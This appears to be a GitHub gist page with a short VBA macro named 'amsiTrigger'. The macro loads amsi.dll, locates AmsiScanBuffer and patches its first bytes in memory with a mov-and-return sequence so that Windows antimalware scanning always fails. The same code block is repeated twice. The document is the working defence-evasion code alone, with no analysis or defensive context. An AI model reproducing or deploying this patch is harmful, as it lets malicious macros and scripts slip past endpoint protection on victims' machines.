DanShaqFu/amsiTrigger.vba Secret

## amsiTrigger.vba
Private Declare PtrSafe Function GetProcAddress Lib "kernel32" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr
Private Declare PtrSafe Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As LongPtr
Private Declare PtrSafe Function VirtualProtect Lib "kernel32" (lpAddress As Any, ByVal dwSize As LongPtr, ByVal flNewProtect As Long, lpflOldProtect As Long) As Long
Private Declare PtrSafe Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As LongPtr)

Private Sub triggerAMSI()
    Dim AmsiDLL As LongPtr
    Dim AmsiScanBufferAddr As LongPtr
    Dim result As Long
    Dim MyByteArray(6) As Byte
    Dim ArrayPointer As LongPtr

    MyByteArray(0) = 184 ' 0xB8
    MyByteArray(1) = 87  ' 0x57
    MyByteArray(2) = 0   ' 0x00
    MyByteArray(3) = 7   ' 0x07
    MyByteArray(4) = 128 ' 0x80
    MyByteArray(5) = 195 ' 0xC3

    AmsiDLL = LoadLibrary("amsi.dll")
    AmsiScanBufferAddr = GetProcAddress(AmsiDLL, "AmsiScanBuffer")
    result = VirtualProtect(ByVal AmsiScanBufferAddr, 5, 64, 0)
    ArrayPointer = VarPtr(MyByteArray(0))
    CopyMemory ByVal AmsiScanBufferAddr, ByVal ArrayPointer, 6

End Sub
	Private Declare PtrSafe Function GetProcAddress Lib "kernel32" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr
	Private Declare PtrSafe Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As LongPtr
	Private Declare PtrSafe Function VirtualProtect Lib "kernel32" (lpAddress As Any, ByVal dwSize As LongPtr, ByVal flNewProtect As Long, lpflOldProtect As Long) As Long
	Private Declare PtrSafe Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As LongPtr)

	Private Sub triggerAMSI()
	Dim AmsiDLL As LongPtr
	Dim AmsiScanBufferAddr As LongPtr
	Dim result As Long
	Dim MyByteArray(6) As Byte
	Dim ArrayPointer As LongPtr

	MyByteArray(0) = 184 ' 0xB8
	MyByteArray(1) = 87 ' 0x57
	MyByteArray(2) = 0 ' 0x00
	MyByteArray(3) = 7 ' 0x07
	MyByteArray(4) = 128 ' 0x80
	MyByteArray(5) = 195 ' 0xC3

	AmsiDLL = LoadLibrary("amsi.dll")
	AmsiScanBufferAddr = GetProcAddress(AmsiDLL, "AmsiScanBuffer")
	result = VirtualProtect(ByVal AmsiScanBufferAddr, 5, 64, 0)
	ArrayPointer = VarPtr(MyByteArray(0))
	CopyMemory ByVal AmsiScanBufferAddr, ByVal ArrayPointer, 6

	End Sub